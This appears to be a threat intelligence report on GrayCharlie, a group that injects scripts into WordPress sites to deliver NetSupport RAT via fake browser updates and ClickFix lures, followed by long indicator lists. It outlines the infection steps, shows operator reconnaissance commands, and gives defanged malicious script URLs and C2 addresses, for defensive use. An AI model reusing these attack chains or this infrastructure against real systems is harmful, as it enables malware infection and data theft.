Executive Summary

Insikt Group has been monitoring GrayCharlie, a threat actor overlapping with SmartApeSG and active since mid-2023, for some time, and is now publishing its first report on the group. GrayCharlie compromises WordPress sites and injects them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms. These infections often progress to the deployment of Stealc and SectopRAT. Insikt Group identified a large amount of infrastructure linked to GrayCharlie, primarily tied to MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, both actor-controlled and compromised staging infrastructure, and higher-tier infrastructure used to administer operations. While most compromised websites appear to be opportunistic and span numerous industries, Insikt Group identified a cluster of United States (US) law firm sites that were likely compromised around November 2025, possibly through a supply-chain compromise involving a shared IT provider.

To protect against GrayCharlie, security defenders should block IP addresses and domains tied to associated remote access trojans (RATs) and infostealers, flag and potentially block connections to compromised websites, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section of this report for implementation guidance and Appendix A for a complete list of indicators of compromise (IoCs).

Key Findings

• GrayCharlie, which overlaps with SmartApeSG and first emerged in mid-2023, is a threat actor that injects links to externally hosted JavaScript into compromised WordPress sites. These links redirect victims to NetSupport RAT infections delivered via fake browser update pages or ClickFix techniques, ultimately resulting in Stealc and SectopRAT infections.
• Insikt Group identified a wide range of GrayCharlie infrastructure, largely associated with MivoCloud and HZ Hosting Ltd. This includes NetSupport RAT command-and-control (C2) servers, staging infrastructure made up of both actor-controlled and compromised infrastructure, as well as components of GrayCharlie’s higher-tier infrastructure used to manage its operations.
• Insikt Group identified two primary attack chains associated with GrayCharlie: one in which victims encounter fake browser update pages after visiting compromised websites, and another in which they are presented with a ClickFix pop-up, a technique that has become increasingly common in 2025.

Background

GrayCharlie is Insikt Group’s designation for a threat activity group that first appeared in mid-2023 and is behind SmartApeSG, also referred to as ZPHP or HANEYMANEY. The group’s operations typically involve injecting malicious JavaScript into legitimate but compromised WordPress sites. Visitors to these sites are shown convincing, browser-specific fake update prompts (such as for Chrome, Edge, or Firefox) that encourage them to download what appears to be an update but is actually malware.

In late March or early April 2025, SmartApeSG shifted from using fake browser updates to deploying ClickFix lures, mirroring a broader trend among threat actors of increasingly adopting ClickFix.

GrayCharlie predominantly delivers NetSupport RAT; however, deployments of Stealc and, more recently, SectopRAT, have been observed in rare instances. The group’s ultimate objectives remain uncertain. Current evidence suggests a focus on data theft and financial gain, with a theoretical, but unsubstantiated, possibility that it may sell or transfer access to other threat actors.

Threat Analysis

Insikt Group has been tracking GrayCharlie for an extended period and has observed the actor’s persistent behavior since its emergence in 2023. GrayCharlie continues to conduct the same types of operations, regularly deploying large volumes of new infrastructure and adhering to consistent tactics, techniques, and procedures (TTPs), including continued use of the same infection chains and NetSupport RAT payloads. The group targets organizations worldwide, with a particular focus on the US. The following sections provide a detailed examination of GrayCharlie’s operational infrastructure and its two primary attack chains.

Infrastructure Analysis

NetSupport RAT Clusters

Insikt Group identified two main NetSupport RAT clusters linked to GrayCharlie based on factors such as TLS certificates, NetSupport serial numbers and license keys, and the timing of the activity (see Figure 1). In addition, Insikt Group identified a range of other NetSupport RAT C2 servers linked to GrayCharlie activity, but which are not currently attributed to either of the two main clusters. Insikt Group assesses that these clusters may correspond either to different individuals associated with GrayCharlie or to distinct GrayCharlie campaigns. The clusters are further described below.

Figure 1: Overview of GrayCharlie clusters observed in 2025 (Source: Recorded Future)

Cluster 1

Cluster 1 comprises NetSupport RAT C2 servers whose TLS certificates display a recurring monthly naming pattern. All servers in this cluster are hosted by MivoCloud and were deployed between March and August 2025. Notably, NetSupport RAT samples associated with the cluster’s March and April infrastructure used the license key DCVTTTUUEEW23 and serial number NSM896597, before shifting to the license key EVALUSION and serial number NSM165348 in subsequent deployments. The C2 servers associated with this cluster are listed in Table 1.

Table 1: NetSupport RAT C2 servers linked to Cluster 1 (Source: Recorded Future)

Notably, the NetSupport RAT C2 servers in Cluster 1 are connected not only through the characteristics previously described, but also by the near-simultaneous creation of their TLS certificates. For example, the TLS certificate with the common name june5ebatquot associated with IP address 94[.]158[.]245[.]135 was generated on June 30, 2025 at 4:55:20 PM, while the certificate with the common name june6 linked to 94[.]158[.]245[.]174 was created only 20 seconds later.

Cluster 2

Cluster 2 comprises NetSupport RAT command-and-control servers whose TLS certificates typically start with two or more repetitions of “s”, followed by an “i” and a number (so “sssi3”, for example). NetSupport RAT samples linked to Cluster 2 used the license key XMLCTL and serial number NSM303008. The NetSupport RAT C2 servers typically also host an instance of the vulnerability scanner Acunetix. The C2 servers associated with this cluster are listed in Table 2. Notably, all TLS certificates associated with this cluster were created in a single batch on June 17, 2025.

Table 2: NetSupport RAT C2 servers linked to Cluster 2 (Source: Recorded Future)

Of note, one NetSupport RAT C2 server (94[.]158[.]245[.]56) used a TLS certificate with the common name 23sss, created in May 2025, and was linked to a NetSupport RAT sample that carried the same license key (EVALUSION) and serial number (NSM165348) previously observed in Cluster 1.

Other NetSupport RAT C2 Servers

Insikt Group identified an additional set of NetSupport RAT C2 servers linked to GrayCharlie that did not form a distinct cluster (see Table 3). However, all the servers were hosted by MivoCloud and were associated with NetSupport RAT samples using license key and serial number combinations observed in Clusters 1 and 2.

Table 3: Additional NetSupport RAT C2 servers linked to GrayBravo (Source: Recorded Future)

Staging Infrastructure

Once GrayCharlie victims land on the compromised WordPress sites, thereby satisfying the conditional logic, the payload is typically fetched from the attacker-controlled infrastructure and injected into the compromised WordPress sites. Insikt Group has identified two distinct types of staging infrastructure, each characterized by different website templates. Type 1 is modeled after “Wiser University,” and Type 2 is modeled after “Activitar.”

Type 1: “Wiser University”

The IP addresses associated with the Type 1 staging infrastructure are linked to websites impersonating “Wiser University” (see Figure 2), a fictional entity used to demonstrate Wiser, a free Bootstrap HTML5 education website template for school, college, and university websites. (As a sidenote, Oreshnik is the name of a Russian intermediate-range ballistic missile reportedly capable of speeds exceeding Mach 10.) Appendix B lists the IP addresses associated with the Type 1 staging infrastructure. All IP addresses, except for one, are announced by AS202015 (HZ Hosting Ltd).

Figure 2: Website impersonating “Wiser University” (Source: Recorded Future)

Suspected Testing Infrastructure

Although most IP addresses associated with the Type 1 staging infrastructure are announced by AS202015, as shown in Appendix B, Insikt Group also identified a small subset announced by other ASNs that host the same websites (see Table 4). On average, approximately one such IP address appears to be established each month. Notably, most of these IP addresses appear to geolocate to Russia, and the same ASNs are consistently reused within the same timeframe.

Table 4: Additional infrastructure possibly linked to GrayCharlie (Source: Recorded Future)

Type 2: “Activitar”

Insikt Group identified an additional set of staging infrastructure, referred to as “Type 2.” The IP addresses in this cluster commonly host specific websites (see Figure 3). Insikt Group assesses that this template was sourced elsewhere and is not unique to GrayCharlie.

Figure 3: Website impersonating “Activitar” (Source: Recorded Future)

A subset of domains and IP addresses associated with Type 2 is presented in Table 5. Notably, most of the IP addresses are also announced by AS202015 (HZ Hosting Ltd), and one domain in Table 5, filmlerzltyazilimsx[.]shop, is linked to the email address oreshnik[@]mailum[.]com through its WHOIS record.

Table 5: Domains and IP addresses linked to Type 2 staging infrastructure (Source: Recorded Future)

Compromised Infrastructure

GrayCharlie commonly injects malicious scripts into the Document Object Model (DOM) of compromised WordPress sites using script tags. Insikt Group has identified several recurring URL patterns tied to this activity: some URLs load externally hosted JavaScript files (such as hxxps://joiner[.]best/work/original[.]js), while others call a PHP file on specific endpoints using an ID parameter (such as hxxps://signaturepl[.]com/work/index[.]php?abje2LAw). Notably, these URLs are updated over time by the threat actor, complicating detection and indicating the threat actor maintains ongoing access to a large pool of compromised WordPress installations. Appendix A lists a subset of WordPress websites infected by GrayCharlie.

Although the exact initial access vector is unknown, it is likely that the actors either purchase access, such as via malware logs containing WordPress admin credentials, or exploit vulnerable WordPress plugins. The latter remains the most frequent cause of all WordPress compromises.

Suspected Compromise of “Law Firm Acceleration Company” SMB Team

While the GrayCharlie-linked compromised WordPress sites span a wide range of industry verticals, in a few rare instances, the threat actors appear to have obtained, either through their own intrusions or via a third party, a more targeted set of WordPress domains. Specifically, at least fifteen websites belonging to US law firms were observed loading the external JavaScript hosted at hxxps://persistancejs[.]store/work/original[.]js (see Table 6).

Insikt Group assesses that GrayCharlie (or the third party GrayCharlie works with) likely compromised these websites through a supply-chain vector. One potential avenue is SMB Team, the self-described “fastest-growing law firm acceleration company,” which has supported thousands of firms across North America, according to its website, as its logo and other references appear across many of the websites listed in Table 6 (see Figure 4). Notably, credentials associated with an SMB Team email address used for a WordPress hosting platform surfaced around the same time that the domain persistancejs[.]store first began resolving. This temporal overlap suggests that the threat actors may have gained access to SMB Team-related infrastructure through the use of legitimate, compromised credentials.

Table 6: Compromised law firm websites linked to GrayCharlie (Source: Recorded Future)

Notably, while an SMB Team compromise is possible, Insikt Group also assesses that the actors may have exploited a specific version of WordPress or its plugins used by SMB Team, which could explain the simultaneous compromise of all affected websites.

In some instances, the same compromised WordPress sites are compromised by multiple threat actors simultaneously. For example, bianchilawgroup[.]com was also breached by TAG-124 (also known as LandUpdate808 or Kongtuke) since at least December 2025, which used the domain vimsltd[.]com.

Higher-Tier Analysis

GrayCharlie administers its staging infrastructure primarily over SSH, though other ports are used intermittently. The group manages its NetSupport RAT C2 servers over TCP port 443. Overall, Insikt Group assesses that GrayCharlie relies extensively on proxy services to administer its infrastructure. Additionally, based on presumed browsing activity from higher-tier servers, at least some individuals linked to GrayCharlie are assessed to be Russian-speaking.

Attack-Chain Analysis

GrayCharlie has been observed using two different attack chains to deliver NetSupport RAT. The first chain uses compromised websites to distribute a fake browser update that triggers the retrieval and installation of a script-based payload; the second chain uses compromised WordPress sites and a ClickFix-style lure that copies a command to fetch and install the RAT. Both culminate in NetSupport execution from %AppData%, Registry Run key persistence, and C2 connectivity; the technical details are expanded below.

Attack Chain 1: Fake Browser Update Leading to NetSupport RAT

According to public reporting, when GrayCharlie first became active in mid-2023, it relied on fake browser updates to deliver the NetSupport RAT. Although the group later shifted to the ClickFix technique, Insikt Group observed a return to fake browser updates as early as October 12, 2025. Figure 5 provides an overview of Attack Chain 1.

Figure 5: Attack Chain 1 (Source: Recorded Future)

1. Website compromise and lure delivery. Threat actors modify legitimate sites to load malicious scripts that render a browser-specific “update” prompt. Selecting the prompt initiates download of a ZIP “update” package containing a primary JavaScript file alongside decoy .dat files.
2. User-executed JavaScript loader. The victim manually runs the .js script. The script mimics a benign browser component to reduce suspicion while silently initiating the next stage of the attack.
3. PowerShell staging via WScript. The JavaScript launches wscript.exe, which spawns powershell.exe. PowerShell reaches out to a remote host to fetch an obfuscated JavaScript containing encoded tasking.
4. Secondary payload retrieval. PowerShell decodes instructions and downloads the actual payload ZIP archive. This archive contains a complete NetSupport RAT client set, including client32.exe and required DLLs.
5. File deployment and execution. The archive is extracted under the user profile (for example, %AppData%\Roaming\...). client32.exe is started in the background to minimize visible indicators to the user.
6. Persistence establishment. A Windows Run registry key is created to automatically launch client32.exe at logon, ensuring the NetSupport RAT remains active after reboots without requiring further user interaction.
7. C2 readiness. With the NetSupport RAT client running on the infected host, the endpoint is prepared to establish command-and-control connectivity with the attacker's infrastructure.

Attack Chain 2: WordPress Redirects and ClickFix Leading to NetSupport RAT

As early as April 2025, GrayCharlie began using ClickFix as a secondary attack chain, consistent with industry reporting that many threat actors have adopted ClickFix techniques due to their effectiveness. Figure 6 provides an overview of Attack Chain 2.

Figure 6: Attack Chain 2 (Source: Recorded Future)

1. Initial delivery and redirection. Phishing emails, malicious PDFs, or links on gaming sites direct users to compromised WordPress pages that embed attacker JavaScript.
2. Background script and profiling. A background script loads when the site is visited, injects an iframe, and profiles the environment (such as the operating system and browser) to deliver the next stage.
3. ClickFix fake CAPTCHA. The page presents a fake CAPTCHA that quietly copies a malicious command to the user’s clipboard and instructs them to paste it into the Windows Run dialog (Win+R), turning social engineering into user-assisted execution (see Figure 7).

Figure 7: Fake Captcha (Source: Elastic)

1. Command-driven staging. The pasted command retrieves a batch file that downloads a ZIP containing NetSupport RAT and uses PowerShell to extract it into %AppData%\Roaming\ (see Figure 8).

Figure 8: PowerShell command (Source: Cybereason)

1. NetSupport RAT launch and persistence. The batch file starts client32.exe and sets a Run registry key to automatically relaunch the NetSupport RAT client at startup, establishing persistence on the endpoint.
2. Remote access and follow-on actions. Once connected to C2, operators can interact with the system, perform reconnaissance (for example, domain group membership queries), transfer files, execute additional commands, and potentially move laterally using access acquired from the host.

Observed Operator Activity

In October 2025, Insikt Group detonated a NetSupport RAT sample (SHA256: 31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c) with the C2 server 5[.]181[.]156[.]234[:]443 linked to GrayCharlie within a controlled environment. Later that day, approximately three hours later, the threat actor connected using NetSupport RAT, compressed and moved two files, and then executed group and account reconnaissance commands. The same actor returned three days later and repeated the previously observed reconnaissance commands (see Figure 9).

net group /domain "Domain COmputers"
C:\Windows\system32\net1 group /domain "Domain COmputers"

Figure 9: Reconnaissance commands (Source: Recorded Future)

When both files were compressed into a single ZIP archive and the executable was detonated, the process sideloaded a DLL identified as Sectop RAT (SHA256: 59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78) with the C2 server 85[.]158[.]110[.]179[:]15847. The executable (SHA256: 5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428) was identified as “Merge XML Files”, version 1.2.0.0, developed by Vovsoft, and was signed with a digital certificate that expired on October 31, 2025.

Mitigations

• Leverage the IoCs in Appendix A and Appendix B to investigate potential past or ongoing infections, both successful and attempted; Recorded Future customers can use the Recorded Future Intelligence Operations Platform to monitor for future IoCs associated with GrayCharlie.
• Monitor for validated infrastructure associated with the malware families discussed in this report, including NetSupport RAT and Stealc, as well as numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.
• Leverage the Sigma, YARA, and Snort rules provided in Appendices D, E, and F in your security information and event management (SIEM) or endpoint detection and response (EDR) tools to detect the presence or execution of NetSupport RAT. Customers can use additional detection rules available in the Recorded Future Intelligence Operations Platform.
• Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure.
• Use the Recorded Future Intelligence Operations Platform to monitor GrayCharlie, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.
• Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to your company. For example, if you want to stay informed about activities related to GrayCharlie, you can receive regular AI-generated updates on this threat actor.

Outlook

GrayCharlie has been operating for more than two years, and despite shifts in its tactics, such as alternating between fake updates and ClickFix techniques or transitioning from SmartApe to other hosting providers like MivoCloud, the group’s core behaviors have remained consistent. Given its sustained activity, GrayCharlie is highly likely to remain active and continue targeting organizations worldwide, with a current emphasis on US entities, as indicated by Recorded Future Network Intelligence.

Insikt Group will continue to closely monitor GrayCharlie to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.

Appendix A: Indicators of Compromise

Cluster 1 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]60
5[.]252[.]178[.]23
5[.]252[.]178[.]123
94[.]158[.]245[.]13
94[.]158[.]245[.]63
94[.]158[.]245[.]66
94[.]158[.]245[.]81
94[.]158[.]245[.]104
94[.]158[.]245[.]111
94[.]158[.]245[.]115
94[.]158[.]245[.]118
94[.]158[.]245[.]131
94[.]158[.]245[.]135
94[.]158[.]245[.]137
94[.]158[.]245[.]140
94[.]158[.]245[.]174
185[.]163[.]45[.]30
185[.]163[.]45[.]41
185[.]163[.]45[.]61
185[.]163[.]45[.]73
185[.]163[.]45[.]87
185[.]163[.]45[.]97
185[.]163[.]45[.]130
185[.]225[.]17[.]74
194[.]180[.]191[.]17
194[.]180[.]191[.]51
194[.]180[.]191[.]168
194[.]180[.]191[.]171
194[.]180[.]191[.]189

Cluster 2 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]9
5[.]181[.]159[.]38
5[.]181[.]159[.]112
5[.]181[.]159[.]139
5[.]181[.]159[.]140
5[.]181[.]159[.]142
5[.]181[.]159[.]143

Other NetSupport RAT C2 Servers:
5[.]181[.]156[.]234
5[.]181[.]156[.]244
5[.]181[.]159[.]29
5[.]181[.]159[.]62
5[.]252[.]177[.]15
5[.]252[.]177[.]120
5[.]252[.]178[.]35
94[.]158[.]245[.]153
94[.]158[.]245[.]170
185[.]163[.]45[.]16
194[.]180[.]191[.]18
194[.]180[.]191[.]121
194[.]180[.]191[.]209

NetSupport RAT Hashes:
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268
0e9df9294c36702eee970efcb4a70b6ddb433190ab661273e2e559185c55b6c1
112bf17e7c0d0695e9229d60f0d2734c6b96d7edfb41ea3e98e518f4fb1ae6e9
11370e108c8e7a53e52f01df0829c8addb5833145618a7701fbedbb1d837a43d
15dfe9d443027ba01b8f54f415fd74d373b3a06017db8ef110fb55b33357b190
16c8b5e10135d168d73a553a4bda51628e5b4fd419c0ecd47ca4cd7aa864ebd5
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
1900ca9b482273df3127e221526023c025808d8fd65769a418fe1f346e7d41e2
1c389bf1859a00c58b6a97c02fc26c2fe9766c43e06242a94e92b6585b62398b
21a24922b29742977c4f7e25dd2be056dc02bc5e70c98e32ec3e0c6206f4d9ef
312a0e4db34a40cb95ba1fac8bf87deb45d0c5f048d38ac65eb060273b07df67
31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c
31f69d67eca6f3fc837e8d10dff4e2fb6643e33c118cff87df4fee2b183bf0e0
37e8b57ff4d724053b1917dc6edaca0708d44ceecd00cab7e4cabb336c2868d7
3ac57bea954ce68dc937f6954ae8a6a19a367a579aeeda7cc93ddd5968fae250
3ada20fbd80ec7f536db8303a5fa029af741a6914de61376ac8f81ac3ac728fd
3b5658532bc4058131689c5641def85d7ae25d5b837d3d1aff3af7bb25581f17
3c499faac4b973c237670f046973691a245ecd735ffebcca3e93337d94b71cde
3c4b87be8450e3120b7ad2b11ff59850950beb39906dc1636b3ee7b6390f2086
4732f025a2a69f6c40787854c5da122689702f00f4f423061bb30ab7fa1e98d3
5381b2a7a77448c4908f5c79d21631f56c88ead0365981cac1dcaafe493c313e
53e9511401000f61c9d910b92cd6d5a58e38ae541975135944885e53fa91ecb7
5dfbd8cf98ebd4977d4f240dcabd5cd67b936c0095c2d5b9a77896daea877df6
5eebdb584a1acd6aacc36c59c22ec51bbd077d2dbbe0890b52e62fa6fb9cf784
5ff742e134e3d17ec7abea435f718e8f5603b95e7984e024b2310ac9ef862ddf
60ff43424c0ba9dc259ab32405345ef325a4cb4d0baf0c0b0c13f9d3672e99eb
68c6411cc9afa68047641932530cf7201f17029167d4811375f1458cae32c7bd
6b2c41b42f75e64d435ba56c2f2b6d79a11b862a2d994487dab3e51e298bc5c9
6b93b7372941a09f1ea69f8b71c5c4e211ea0f8a24061e702002ca84457bcddd
6d0857a9c77f9c5f2a5e6921e1cb9f7e1a5d6b947ad63b364d291157d3f840fb
70f3a6fdbbc5e2ae79c28b48b6478ee3c8ea6f2b705ca9dc9bf8e63a4f6e0c8d
72baf2ecb0a9df607e54b64c0925ffc6739ab5a8b18900bf5c1930bcc799395d
748d546c6db44f6aa4bbb8e586d79f56c63fa87580eb19a0f2d5079cbe0952b7
79040421b5a48dcc6e611dfe187b2f3e355791ad8511adb84f5c0948aa1d6c89
797ae2dbb2c538710fefe75dbe380b9f55b614cb03c4ae09bb3172e8234dd9d9
7a73ae8cca6ce6fa88f89d6154811cb453d6e6db9fa8ed5fbdaf8895aae601a5
7b19538dcf6d4bb84590c458f09c5707c8db53a42861fa56533c49c1a3acd953
7e3634bfd66e601d7585b237437f11f7d614b33705ba5f7bd75ab176c8250d38
858dfa529b960c6f6226b53beb55ba1900d3f498ba7be40724ed5c16d7d5a44b
871e5629d9c8898babf3ed579586e3f5f94a6c4623d3a0a7f9a99bf9d95ffc7b
8763749fd09245e7fa8c0ee2cc797d5520a9ef5d6846f044a0cd7c969c4bd7d4
89d839bbdc786c006304f3c6c6939150380aaa9e84d82bc31cdf0cf7609a6243
8b21fbd40c89763f51d5e06680c0971623500f4724c25958446bac794797057b
8baebd525324297faf86639266060172ded963767c832a609a991fa92c8463ab
8d1ed904d90e08048f42cdc9a25c2159f0f8dc4aa9dc01b0207645ea53abe189
957ab8417606ad41ad31f006d997af3f647dd5215af899551d08b3b472a4bc85
a0332fe0baa316fe793e757f9cf5938b099e97dc4624ead6f3bad8555c8a419b
a1482e62ecc89696a75adea7052c2e98a75c9d37304723abd110d60962bafdb7
a28d0c82a2a37462c2975b5eda7f91e8fc3c2ed50abfe357948ec4faabbd4951
a6637685091835826e62af279cc6c648188797f9edc05a2399a6686349102774
a6f1f68827303e655488c8d54b3be3ce8b1097f3ff374a2e4bc82ff96812781c
abc5b2118bc1d8c82f3726a5e30cf22ae3fa1c572dd3327b281ea6fd97ae9c06
afc45cc0df7f7e481bff45c6f62a6418b6ae4c8b474ec36113e05ab7ca7e2743
b1f91355a8472e364e07f05dc69bbd9c74dc1943e9c4475f46c2b448bb6d6e5d
b2b7218c3f649b9077510aac309357e884c314e0f488abed391415defb249f4c
b6b685fe020c481161060df9dbef0fc205cde479056c18aaeae184daa3f8a9c0
b784301cb2edafea875f779cf24e018f06732561069f6c4c3d86548029671642
ba557bd6b2c1d3297b2c9bd7294e47b9ad9ec6a937cddc879dd563c61a9abcbd
bb451151e52f0868f98e32d26ffa7c2be412b47cd470bf90d3cfe777b4a19f85
bd39f32177dc7a20f5087c5460ebf589035d9051336c69f07a26398f76aec40e
bf37542e9eb7a3b2f51d107e56d7551e6248f06ce18918e3dda2ebe9da1b0e80
bf97c4ff35b5e2c039aa1f1a9a164b7ec4d9339a631c84910b9a4d03b7927b8a
c2ba0018de8dcf0abfb2669cce95ed09377e9a9da7ff8e74e95688c99a025634
c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e
c441afb337c4803eed20ae255fbad3cdfac2800475c51e00a55369909efb4c89
cc6ad344d30178e04e49ab16cd43744925676562aded051835fb3f73401f31fa
ceab18331f785d0bf215f551b90f00567e36d339ba8e3ed8e45c0ad410b25808
d02a1eb597c66b602ac7d55095f771345ff5e90905ea12e523df2095030752b6
d6142f48664208710bab9fcab8dfcda66ad75ad756d2ce9c3aa243dcbc29bf4a
d665a8547baf067f2216821ecd4145eab1c75868f024d09140fb265b819d5194
d8d2092e174240d7bac63a9e1c199b442e1cb0f39d7fa32510b1aa7717c3ae38
e24de02415946133176b66017d54a5dcd7270c83f5ef01d79faff4e64d13c63b
e5502722c2bb84876903549445534c47cdaa586a0bb1e5b3a53162d75cc6cb28
e66ae0ac443b5140a1b35b5aaa6899eea296d9d633988eb044a395a34a887431
e92e01977d85f6834f57bd09e29e654b10da798844e4a64470cb22dac78bef93
e9723a2a9ca45787c35b864605a6be71ccf12b2d96dad8e7fc39117f7ba29abb
f28bb7bc5c801d5444ba6816e3a91d5bfaf0307578b7a1529415fc220fd9e9e8
f86b6aa11a276c24dd80db48f43c8a2f0c8df6e5426a7a0fee322c0427421ebb

“Type 1” Staging Server IP Addresses:
77[.]83[.]199[.]3
77[.]83[.]199[.]15
77[.]83[.]199[.]31
77[.]83[.]199[.]42
77[.]83[.]199[.]73
77[.]83[.]199[.]82
77[.]83[.]199[.]88
77[.]83[.]199[.]90
77[.]83[.]199[.]112
77[.]83[.]199[.]123
77[.]83[.]199[.]132
77[.]83[.]199[.]142
77[.]83[.]199[.]170
79[.]141[.]160[.]24
79[.]141[.]160[.]34
79[.]141[.]161[.]50
79[.]141[.]161[.]171
79[.]141[.]162[.]35
79[.]141[.]162[.]37
79[.]141[.]162[.]50
79[.]141[.]162[.]132
79[.]141[.]162[.]149
79[.]141[.]162[.]169
79[.]141[.]162[.]177
79[.]141[.]162[.]181
79[.]141[.]162[.]187
79[.]141[.]162[.]204
79[.]141[.]162[.]229
79[.]141[.]163[.]138
79[.]141[.]163[.]176
79[.]141[.]172[.]204
79[.]141[.]172[.]223
79[.]141[.]172[.]229
79[.]141[.]172[.]232
79[.]141[.]172[.]240
79[.]141[.]173[.]60
79[.]141[.]173[.]161
79[.]141[.]173[.]168
85[.]158[.]111[.]29
85[.]158[.]111[.]38
85[.]158[.]111[.]53
85[.]158[.]111[.]75
85[.]158[.]111[.]81
85[.]158[.]111[.]126
89[.]46[.]38[.]34
89[.]46[.]38[.]48
89[.]46[.]38[.]88
89[.]169[.]12[.]48
91[.]193[.]19[.]32
91[.]193[.]19[.]64
91[.]193[.]19[.]78
91[.]193[.]19[.]127
91[.]193[.]19[.]163
91[.]193[.]19[.]188
91[.]193[.]19[.]190
98[.]142[.]240[.]165
98[.]142[.]240[.]188
98[.]142[.]240[.]214
98[.]142[.]240[.]221
98[.]142[.]240[.]246
98[.]142[.]251[.]26
98[.]142[.]251[.]32
98[.]142[.]251[.]42
98[.]142[.]251[.]53
185[.]33[.]84[.]131
185[.]33[.]84[.]153
185[.]33[.]84[.]169
185[.]33[.]85[.]20
185[.]33[.]85[.]26
185[.]33[.]85[.]33
185[.]33[.]85[.]38
185[.]33[.]85[.]52
185[.]33[.]86[.]37
193[.]42[.]38[.]11
193[.]42[.]38[.]79
193[.]42[.]38[.]85
193[.]42[.]38[.]86
193[.]111[.]208[.]2
193[.]111[.]208[.]17
193[.]111[.]208[.]19
193[.]111[.]208[.]23
193[.]111[.]208[.]24
193[.]111[.]208[.]46
193[.]111[.]208[.]75
193[.]111[.]208[.]97
193[.]111[.]208[.]100

Additional IP Addresses Likely Linked to “Type 1” Staging Infrastructure:
23[.]140[.]40[.]66
45[.]153[.]191[.]245
46[.]29[.]163[.]28
89[.]169[.]12[.]48
89[.]253[.]222[.]25
89[.]253[.]222[.]156
95[.]182[.]123[.]86
185[.]231[.]245[.]158
217[.]114[.]15[.]253

“Type 2” Staging Server IP Addresses:
45[.]61[.]134[.]76
77[.]83[.]199[.]162
79[.]141[.]162[.]135
79[.]141[.]163[.]169
91[.]193[.]19[.]220
144[.]172[.]115[.]211
172[.]86[.]90[.]84
185[.]33[.]86[.]11
185[.]80[.]53[.]79
194[.]15[.]216[.]118

“Type 2” Staging Server Domains:
filmlerzltyazilimsx[.]shop
foolowme[.]com
joiner[.]best
lowi1[.]com
morniksell[.]com
persistancejs[.]store
pomofight[.]com
port4loms[.]com
signaturepl[.]com
yungask[.]com

Domains Linked to oreshnik[@]mailum[.]com:
108zhao[.]shop
1sou[.]top
6hms[.]top
789pettoys[.]shop
7serv[.]top
99wc[.]top
abocamuseum[.]icu
actionmovies[.]top
alcmz[.]top
alhasba[.]com
amxdh1[.]icu
anoteryo[.]top
arearugs[.]top
as5yo[.]top
ashesplayer[.]top
avodaride[.]top
azyaamode[.]shop
baihao[.]shop
baihuah[.]top
bedoueroom[.]top
bestproductreviews[.]xyz
bestrollerballpen[.]top
blogdojhow[.]com
bnpparibas[.]top
bokra[.]top
bond007[.]xyz
boxworld[.]top
bstionline[.]com
buildingjobs[.]xyz
buscavuelosbaratos[.]top
buyedmeds[.]top
buylisinopril[.]top
celebrex[.]top
chaojiwang[.]top
chenyiwen[.]top
chinapark[.]top
christianlouboutin2017[.]top
cialissale[.]top
cinselurunler[.]xyz
coinseasygenerator[.]top
couterfv[.]top
couturella[.]shop
covaticonstructioncorp[.]shop
cozartan[.]top
cryptohardware[.]shop
dcdh4[.]shop
dealermobil[.]top
depechemode[.]shop
directoryframework[.]top
discountmontblanc[.]top
discoveronline[.]top
doodstream[.]shop
downloadfreak[.]top
erectilehelp[.]top
filmezz[.]top
filmlerzltyazilimsx[.]shop
fjs95[.]shop
fmovies123[.]top
forging[.]top
fragzone[.]top
franquicias[.]top
fuckhdmov[.]top
gededewe[.]shop
getin[.]top
glitterygadgets[.]shop
gmartph[.]shop
gmt-a[.]shop
grandzxc[.]bet
guosong[.]top
haidao10[.]top
headtechnologies[.]xyz
healthcareplans[.]top
heim-k[.]shop
helperection[.]top
hilfe-ed[.]top
hirek[.]top
howtogetaloan[.]top
ida-ci[.]com
islighting[.]top
iwine[.]top
izone[.]digital
jerseysus[.]top
jiezishijie[.]top
jkse[.]shop
jsmakert[.]shop
k2bsc[.]top
kaestner[.]top
kamagrafr[.]icu
kanshuwang[.]top
kazumaka[.]top
kfzversicherungskosten[.]top
khusinhthaidanphuong[.]top
kingdomholding[.]top
krediteonlinevergleichen[.]top
lang3666[.]top
langwonet[.]top
layardrama21[.]top
lebensversicherungvergleich[.]top
levciavia[.]top
linhua97[.]top
linksoflondononsale[.]top
linksoflondonsale[.]top
liruo[.]top
liveskortv[.]shop
loanonline[.]top
loispaigesimenson[.]com
losartan[.]top
lovedou[.]top
lqsword[.]top
lx7v9[.]top
lycosex[.]top
machine-a-plastifier[.]com
manwithedhelp[.]top
marmocer[.]top
mbpen163[.]top
medicamentsbonmarche[.]top
meimei68[.]top
menjimmychooonline[.]top
milebox[.]shop
mindsetgrowth[.]shop
mm37[.]icu
monclerjackets[.]top
moruk[.]xyz
motocyclenews[.]top
moviefone[.]top
moviesone[.]top
movtime76[.]shop
movtime78[.]shop
musicdownloader[.]top
my-privatebanker[.]top
mybeststream[.]xyz
nackt-bilder[.]top
nana44[.]shop
newbalancesport[.]top
palcomp3[.]top
parisforrent[.]top
pasangiklan[.]top
patekphillipwatches[.]top
pielsteel[.]top
pravaix[.]top
rag382[.]top
rasin[.]shop
refanprediction[.]shop
regopramide[.]top
rnsddse[.]top
sales2016[.]top
sdnews[.]top
searchgo[.]shop
searchweb[.]top
semikeren[.]icu
simvascor[.]icu
simvascor[.]top
snapcans[.]top
sneakermall[.]top
soap2dayfree[.]top
